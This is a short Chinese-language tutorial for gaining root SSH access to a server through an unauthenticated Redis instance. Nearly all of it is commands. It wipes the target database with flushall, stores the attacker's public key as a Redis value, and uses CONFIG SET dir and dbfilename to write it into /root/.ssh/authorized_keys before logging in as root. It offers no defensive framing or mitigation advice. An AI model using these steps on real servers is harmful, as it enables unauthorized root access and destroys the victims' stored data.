通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。
一,生成本地ssh公钥
ssh-keygen 最后在/root/.ssh/id_rsa.pub这个文件里面
二,先连接redis看看
telnet 10.10.10.102 6379
redis-cli -h 10.10.10.102
三, 清一下redis数据库
redis-cli -h 10.10.10.102 flushall
四, 向redis写自己的公钥
(echo -e “\n\n”;cat /root/.ssh/id_rsa.pub;echo -e"\n\n")>key.txt /一定要加上换行符,不然传过去密钥他前面会有一些乱码就无法登陆
cat key.txt |redis-cli -h 10.10.10.102 -x set redis
五, 利用redis写入到文件中
#连接redis
#redis-cli -h 10.10.10.102
#查看keys
10.10.10.102>keys *
#写入配置库的路径及存放位置
10.10.10.102>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
10.10.10.102>CONFIG SET dbfilename authorized_keys
#写入
10.10.10.102>save
#退出
10.10.10.102>exit
六, 远程连接
ssh root@10.10.10.102